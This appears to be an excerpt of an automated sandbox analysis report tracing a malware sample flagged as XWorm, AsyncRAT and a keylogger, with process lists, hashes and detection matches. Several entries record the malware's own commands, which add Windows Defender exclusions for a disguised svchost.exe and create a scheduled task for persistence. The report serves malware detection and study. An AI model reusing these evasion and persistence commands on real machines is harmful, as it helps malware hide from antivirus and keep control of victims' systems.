Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000000.2149098147.00007FF6AE88B000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	false

Target ID:	3
Start time:	04:37:06
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0xe70000
File size:	75'264 bytes
MD5 hash:	12B722899C9A6B517D52B8DE2C7C3E2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3395976559.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs
Reputation:	low
Has exited:	false

Target ID:	4
Start time:	04:37:10
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	04:37:10
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	04:37:17
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	04:37:17
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	04:37:28
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	04:37:28
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	04:37:45
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 6400, Parent PID: 1220

General

Target ID:	16
Start time:	04:37:45
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	17
Start time:	04:38:07
Start date:	20/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
Imagebase:	0x7ff61a980000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	18
Start time:	04:38:07
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	19
Start time:	04:38:08
Start date:	20/11/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\svchost.exe
Imagebase:	0xd60000
File size:	75'264 bytes
MD5 hash:	12B722899C9A6B517D52B8DE2C7C3E2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\svchost.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs
Has exited:	true

Target ID:	20
Start time:	04:39:01
Start date:	20/11/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\svchost.exe
Imagebase:	0x9a0000
File size:	75'264 bytes
MD5 hash:	12B722899C9A6B517D52B8DE2C7C3E2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true